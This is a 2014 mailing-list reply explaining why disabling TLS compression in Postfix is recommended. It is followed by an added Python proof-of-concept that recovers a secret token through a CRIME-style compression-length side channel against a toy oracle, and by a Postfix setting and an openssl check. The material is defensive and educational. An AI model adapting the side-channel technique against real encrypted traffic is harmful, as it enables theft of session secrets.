[Ach] NO_COMPRESSION on postfix

Aaron Zauner azet at azet.org
Thu Dec 18 12:55:00 CET 2014


* Tim <tim at bastelfreak.de> [141218 10:27]:
> Hi guys,
> 
> you recommend "tls_ssl_options = NO_COMPRESSION" on postfix, can you
> tell me why compression is a bad idea? I'm familiar with
> https://en.wikipedia.org/wiki/CRIME but this seems to only apply on http?

Very good question.

The BREACH attack works specifically on HTTP compression. CRIME
applies to TLS compression in general. That being said, CRIME won't
work against SMTP. It might work against other protocols, I remember
playing a Capture The Flag two years ago where they implemented
their own (non-HTTP) protocol that was vulnerable to CRIME:
http://broot.ca/plaidctf-compression-crypto-250

Anyway. It is common practice nowadays to disable TLS compression
altogether. TLS compression will also not be available in the new
TLS standard (1.3) due to these concerns regarding compression
attacks.

So: It's really up to you, but our guide will still recommend
turning it off.

Aaron
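A worked illustration of the point above, that the leak lives in DEFLATE itself and not in HTTP, as an added example that is not part of the original post and not Postfix code. The Python script below plays the attacker against a compress-then-encrypt oracle of the kind TLS compression creates: the record layout, the secret `token=7f3a9c1e`, the known prefix `token=` and the hex alphabet are all constructed assumptions, and the only thing the oracle returns is the compressed length, which is exactly what an eavesdropper on an encrypted link can observe.

```python
"""CRIME in miniature: a compression side channel that needs no HTTP.

Added example, not code from the mailing-list post. It models any protocol
that DEFLATE-compresses a record containing attacker-influenced bytes next to
a secret and then encrypts it, which is what TLS-level compression does. The
secret, the record layout and the attacker's known prefix are constructed.
"""
import zlib

# Constructed secret; stands in for a session cookie, an AUTH token, or any
# other value that is repeated verbatim in records the attacker can influence.
SECRET = b"token=7f3a9c1e"
CHARSET = b"0123456789abcdef"   # alphabet the attacker assumes for the secret


def compressed_size(attacker_data: bytes) -> int:
    """The oracle: bytes on the wire for one compress-then-encrypt record.

    Encryption hides content but not length, so a network observer learns this
    value exactly. Z_FIXED forces DEFLATE's fixed Huffman table, which keeps the
    bit accounting in cost() exact; the attack also works against dynamic
    tables, it just needs more samples.
    """
    record = attacker_data + b"\nAuthorization: " + SECRET + b"\n"
    comp = zlib.compressobj(level=6, strategy=zlib.Z_FIXED)
    return len(comp.compress(record) + comp.flush())


def cost(attacker_data: bytes) -> int:
    """Sum the oracle over eight paddings to recover the exact bit length.

    DEFLATE output is rounded up to whole bytes, so a saving of a few bits can
    be invisible in a single measurement. Under the fixed Huffman table a
    literal byte >= 0x90 costs 9 bits, so k such bytes shift the bit alignment
    by k (mod 8); summing over k = 0..7 gives a value that is exactly linear in
    the compressed bit length, which makes even a 7-bit saving show up.
    """
    return sum(compressed_size(bytes(range(0xF0, 0xF0 + k)) + attacker_data)
               for k in range(8))


def recover_secret(known_prefix: bytes, length: int) -> bytes:
    """Extend the known prefix one byte at a time.

    The guess that repeats the real next byte gets an LZ77 back-reference one
    byte longer than every wrong guess, which instead has to spend a literal on
    that byte. The cheapest guess is therefore the correct one.
    """
    known = known_prefix
    while len(known) < length:
        best = min(CHARSET, key=lambda c: cost(known + bytes([c])))
        known += bytes([best])
    return known


if __name__ == "__main__":
    recovered = recover_secret(b"token=", len(SECRET))
    print("recovered:", recovered.decode())   # recovered: token=7f3a9c1e
    assert recovered == SECRET
```

Nothing in the script depends on HTTP: any protocol that puts attacker-influenced bytes and a secret into the same compressed record is exposed in the same way, which is why the defence is to disable compression at the TLS layer rather than in one application protocol. On the Postfix side that is the setting this thread is about, tls_ssl_options = NO_COMPRESSION in main.cf (the parameter exists from Postfix 2.11 on). Whether a server still negotiates compression can be checked from a client with openssl s_client -starttls smtp -connect mail.example.com:25 -comp (hostname is a placeholder; on OpenSSL 1.1.0 and later compression is off by default, so -comp is needed for the client to offer it at all) and reading the Compression: line of the handshake summary, which should say NONE.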
